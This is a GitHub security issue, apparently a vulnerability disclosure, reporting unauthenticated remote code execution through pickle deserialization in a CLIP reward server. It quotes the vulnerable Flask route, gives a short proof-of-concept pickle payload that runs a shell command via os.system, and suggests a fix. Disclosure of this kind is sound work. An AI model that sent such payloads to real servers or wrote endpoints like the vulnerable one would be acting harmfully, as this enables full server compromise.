Skip to content

[Security] Unauthenticated RCE via Pickle Deserialization in reward-server/app_clip.py (CWE-502) #14

Description

@xiaoyaoyou2

Summary

CVSS 9.8 (Critical) — Unauthenticated Remote Code Execution via unsafe pickle.loads() on raw HTTP request body in the CLIP reward server.

Affected Code

File: RealGen_v1/flow_grpo/reward-server/app_clip.py:27

@root.route("/", methods=["POST"])
def inference():
    data = request.get_data()
    data = pickle.loads(data)  # ← RCE via untrusted deserialization

The Flask Blueprint endpoint at POST / accepts raw HTTP body data and passes it directly to pickle.loads() with ZERO authentication.

Impact

Complete server compromise. Unauthenticated attacker can execute arbitrary code on the machine running the CLIP reward server (default port 18088).

Proof of Concept

import pickle, os, requests

class Exploit:
    def __reduce__(self):
        return (os.system, ("id > /tmp/pwned_realgen",))

payload = pickle.dumps(Exploit())
requests.post("http://TARGET:18088/", data=payload)

Fix

Replace pickle with JSON. If pickle is necessary, add authentication before deserialization.

Disclosure

Private Vulnerability Reporting is not enabled. For private coordination: xiaoyaotom101df2@xiaoyaobot.top

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions